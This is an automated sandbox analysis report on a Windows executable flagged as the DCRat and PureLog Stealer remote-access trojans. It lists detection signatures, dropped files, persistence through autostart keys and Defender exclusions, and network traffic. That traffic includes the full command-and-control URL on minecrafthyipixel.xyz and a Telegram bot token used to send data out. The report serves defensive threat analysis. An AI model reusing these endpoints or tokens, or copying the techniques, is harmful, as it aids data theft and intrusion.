Windows Analysis Report
W4tW72sfAD.exe

Overview

General Information

Sample name: W4tW72sfAD.exe
(renamed because the original name is a hash value)
Original sample name: 9026338FCE277581062754CAB87462E7.exe
Analysis ID: 1428727
MD5: 9026338fce277581062754cab87462e7
SHA1: 191b8d92c18b84fdef03f691583d8b89598cb7da
SHA256: 5565710131f195b46fb7c0b124d16df72ec5e0aafdd22590eaff7885aead636f
Tags: DCRatexe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: W4tW72sfAD.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\GNRoGDmH.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\EkAnmMVM.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\BazpdGXT.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe ReversingLabs: Detection: 68%
Source: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe ReversingLabs: Detection: 68%
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe ReversingLabs: Detection: 68%
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe ReversingLabs: Detection: 68%
Source: C:\Users\Public\Downloads\RuntimeBroker.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\BazpdGXT.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\EkAnmMVM.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\NEEtYbtY.log ReversingLabs: Detection: 66%
Source: W4tW72sfAD.exe ReversingLabs: Detection: 68%
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BuKwfPUT.log Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Joe Sandbox ML: detected
Source: W4tW72sfAD.exe Joe Sandbox ML: detected
Source: W4tW72sfAD.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\9da3c047e935b1
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: W4tW72sfAD.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.pdb source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 4x nop then jmp 00007FFD9B890356h 19_2_00007FFD9B89014E
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 4x nop then jmp 00007FFD9B890356h 20_2_00007FFD9B89014E
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 4x nop then jmp 00007FFD9B8B0356h 21_2_00007FFD9B8B014E
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 4x nop then jmp 00007FFD9B890356h 22_2_00007FFD9B89014E
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 4x nop then jmp 00007FFD9B8A0356h 38_2_00007FFD9B8A014E
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 4x nop then jmp 00007FFD9B8B0356h 41_2_00007FFD9B8B014E
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 4x nop then jmp 00007FFD9B890356h 44_2_00007FFD9B89014E

Networking

Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 104.21.57.61:80
Source: DNS query: minecrafthyipixel.xyz
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="375a82a9-434c-43d0-8d25-c0ccd816cce2" Host: api.telegram.org Content-Length: 100984 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: Joe Sandbox View IP Address: 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 376 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 1876 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----SKVkDmmIXvVPlbJZk2vuH9rP9KPHZ1VSvi User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 147982 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2172 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2180 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2192 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2504 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2172 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: minecrafthyipixel.xyz Content-Length: 2512 Expect: 100-continue
